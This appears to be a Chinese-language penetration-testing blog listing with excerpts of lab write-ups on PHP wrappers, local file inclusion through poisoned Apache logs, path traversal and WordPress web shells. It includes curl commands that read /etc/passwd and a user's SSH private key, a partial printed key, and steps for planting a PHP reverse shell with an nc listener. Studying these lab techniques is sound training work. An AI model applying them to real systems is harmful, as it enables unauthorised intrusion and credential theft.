ARIES

 PHP Wrappers 包裝器 這裡有一篇介紹 PHP Wrappers 滲透測試的說明寫得不錯，可以先了解流與包裝器的概念 https://www.itread01.com/hkpqlphk.html 回到滲透攻擊，靶機與前一篇一樣是個可以透過 Path Traversal 的網站 ===================================================================== kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php ... <a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a> <!DOCTYPE html> <html lang="en"> <head>     <meta charset="UTF-8">     <meta name="viewport" content="width=device-width, initial-scale=1.0">     <title>Maintenance</title> </head> <body>         <span style="color:#F00;text-align:center;">The admin page is currently under maintenance. ===================================================================== 上述的 BODY 結果中顯示了不完整，結論是部分內容丟失 此時可以先透過包裝器語法 php://filter 測試，發現結果輸出一樣 ===============================================...

 文件包含漏洞 LFI 文件包含漏洞好容易跟目錄遍歷搞混，這裡有一個重點 目錄遍歷是只有讀的權限, 而文件包含漏洞允許在程序運行的代碼中 "包含" 文件 範例手法 : 注入 User-Agent 去包含目標主機本地的執行檔，透過執行輸出要的結果 靶機開始 首先先 rustscan └─$ rustscan -a 192.168.241.16 --ulimit 5000 -t 8000 --scripts -- -n -Pn -sVC 掃完 22、80、2222 open 三個服務分別是 22 - OpenSSH 8.2p1 80 - Apache httpd 2.4.38 2222 - OpenSSH 7.9p1 這一版 Apache 2.4.38 設計成有  Path Traversal(目錄遍歷) 漏洞 路徑為 http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log 透過 curl 測試如下可以看到 Log 內容結果 Burp Suite 也可以看到 Response 顯示 Log 內容 主要內容就是 Apache 紀錄 Client 的存取紀錄如下 <a href="index.php?page=admin.php"><p style="text-align:center">Admin</p></a> 192.168.63.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/ HTTP/1.1" 200 2361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" 192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?pa...

 Path Traversal Attack 目錄遍歷攻擊 當有了互動式 shell 後標準攻擊範例檔案 Linux : /etc/password，指令 cat ../../../../../../../../../etc/passwd 就看你幾層 Windows : C:\Windows\System32\drivers\etc\hosts 這是一個所有人都可以讀的檔案 如果目錄遍歷是透過網址的方式去做, 在 windows 底下一樣吃 " ../ " 這種 URL 舉例要抓一個檔案在 C:\Users\install.txt 那網址可以使用 http://ooxx.com/vun/../../../../../../../../Users/install.txt 方式進行 回到 Linux，當讀到 /etc/passwd 檔案後第一步就是列舉使用者帳號 幾乎都在檔案的後面，代號會從 1000 開始如下圖找到一個帳號叫做 offsec 除了可以用密碼暴力破解以外，另一個方式就是去讀取該使用者加目錄下的 Private Key 路徑都是在使用者 /home/[user account]/.ssh/id_rsa，若存在則我們可以利用該 Key 去登入系統 如下圖發現該帳號 offsec 確實存在 provate key kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../.. /home/offsec/.ssh/id_rsa ... -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAz+pEKI1OmULVSs8ojO/sZseiv3zf2dbH6LSyYuj3AHkcxIND7UTw XdUTtUeeJhbTC0h5S2TWFJ3OGB0zjCqsEI16ZHsaKI9k2CfNmpl0siekm9aQGxASpTiYOs KCZOFoPU6kBkKyEhfjB82Ea1VoAvx4J4z7sNx1+wyd...

 WordPress Web Shell 當拿下一台 WordPress Web Server 的管理員權限後 接著目標應該放在該台 Web Server 的主機端上 有 WordPress 最大權限只能對網站上下其手，無法對系統端操作 此時可以透過許多方式來達到對系統端的控制 最常見的手法是透過佈景主題去修改 404 的網頁內容 範例 :  靶機 IP : 192.168.227.16 點選佈景主題 Theme Editor --> Twenty Twenty --> 404 Template 重點在最下面的有看到 Update File.....表示現有登入權限與檔案權限可以自行定義與更新 直接使用 kali Linux 內建的 php-reverse-shell 範例檔即可 路徑 : /usr/share/wehshells/php/~ 如下圖，當中的 php-reverse-shell.php 就是我們要的 接著先在攻擊端開啟 shell listen ， 這裡使用指令 nc -nvlp8889 來建立 參數 -n : 表示不解析名稱 參數 -v : 顯示訊息 參數 -l : listen 參數 -p : 指定 port netstat -an 一下，確認在 8889 Port 上有 Listen 接著回到剛剛要利用的那個 php web shell 檔案，先將它 COPY 到桌面再進行編輯 要修改的地方僅有兩個，遠端要報到的 IP & Port 輸入攻擊端的 IP 與剛剛我們建立的 nc 8889 Port 然後整個 COPY， ctrl+A --> ctrl+C 然後 ctrl-V 貼到 wordpress 404 的頁面 貼完後按下 Update File 出現檔案編輯成功即可 接著直接執行該連結 http://offsecwp/ wp-content/themes/twentytwenty/404.php 注意所有的 wordpress 外掛都在 /wp-content 路徑下 執行後在 termainal 頁面就會看到連進來了 可以先 tty 看一下，發現不是 tty 可以執行指令 script -c /bin/bash -q /dev/null 快速開啟 tty 接著就跟平時使用 linux ...